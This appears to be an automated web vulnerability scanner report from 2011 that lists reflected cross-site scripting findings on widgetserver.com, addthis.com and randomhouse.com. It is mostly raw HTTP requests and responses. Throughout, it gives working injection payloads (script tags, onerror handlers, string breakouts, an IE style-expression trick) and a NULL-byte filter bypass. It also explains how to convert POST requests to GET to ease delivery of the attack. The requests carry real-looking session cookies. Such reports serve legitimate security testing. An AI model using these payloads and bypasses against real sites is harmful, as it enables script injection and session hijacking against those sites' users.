GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img%20src%3da%20onerror%3dalert(1)>4321673800c/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:09 GMT Expires: Fri, 29 Apr 2011 21:50:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 3871
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74b03<a>2abf9f455e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:48:26 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442 was submitted in the REST URL parameter 18. This input was echoed as 780d0<img src=a onerror=alert(1)>252d78a442 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:54 GMT Expires: Fri, 29 Apr 2011 21:50:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 3912
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16936<a>d3f95d2f680 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:14 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2 was submitted in the REST URL parameter 18. This input was echoed as b607c<img src=a onerror=alert(1)>58e425fd2c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:27 GMT Expires: Fri, 29 Apr 2011 21:48:27 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 7210
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78066<a>4feec1bf34c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:46:37 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413 was submitted in the REST URL parameter 18. This input was echoed as b670d<img src=a onerror=alert(1)>0648de1f413 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:54 GMT Expires: Fri, 29 Apr 2011 21:50:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 2654
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5147c<a>ad3be1bde7f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:04 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0666<script>alert(1)</script>06d3328fdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css?48996 HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 26 Apr 2011 21:48:52 GMT Expires: Thu, 31 Dec 2020 00:00:00 GMT Last-Modified: Wed, 20 Apr 2011 23:47:00 GMT max-age: 604800 P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 119
The requested resource(/syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css) is not available
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1d121<script>alert(1)</script>cb3f46b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 130 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:15 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:15 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Tue, 26 Apr 2011 23:30:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 26 Apr 2011 23:30:15 GMT Connection: close
The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %00de38d<script>alert(1)</script>e9bd80595cd was submitted in the from parameter. This input was echoed as de38d<script>alert(1)</script>e9bd80595cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49283"%3balert(1)//e4e0e74635 was submitted in the from parameter. This input was echoed as 49283";alert(1)//e4e0e74635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.do?from=randomhouse49283"%3balert(1)//e4e0e74635 HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse49283";alert(1)//e4e0e74635"; //--> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17962"><script>alert(1)</script>6f8a1d41037 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037 HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f99'%3balert(1)//44955d1d1a9 was submitted in the from parameter. This input was echoed as 74f99';alert(1)//44955d1d1a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /account.do?from=74f99'%3balert(1)//44955d1d1a9 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:46 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16995
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( '74f99';alert(1)//44955d1d1a9' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from'); if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d54"><script>alert(1)</script>e958056cf4c was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /account.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a0"%3balert(1)//4a17c54e7d8 was submitted in the from parameter. This input was echoed as 584a0";alert(1)//4a17c54e7d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /account.do?from=randomhouse584a0"%3balert(1)//4a17c54e7d8 HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse584a0";alert(1)//4a17c54e7d8"; //--> ...[SNIP]...
The value of the confirmPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef75"><script>alert(1)</script>4190709400fddb906 was submitted in the confirmPassword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the email request parameter is copied into the HTML document as plain text between tags. The payload 41e31<script>alert(1)</script>df5ae1c2f9536e1ca was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc3b"><script>alert(1)</script>a734b570e5619ecdd was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c691"><script>alert(1)</script>070b45f3bf0 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %0086d84<script>alert(1)</script>db18887c0e9 was submitted in the from parameter. This input was echoed as 86d84<script>alert(1)</script>db18887c0e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 was submitted in the from parameter. This input was echoed as 2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /password.do?from=2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:27 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 11462
<!-- forgottenPassword.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1"> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d764b"><script>alert(1)</script>ff6160e5949 was submitted in the from parameter. This input was echoed as d764b"><script>alert(1)</script>ff6160e5949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /password.do?from=%00d764b"><script>alert(1)</script>ff6160e5949 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:32 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 11441
<!-- forgottenPassword.vm -->
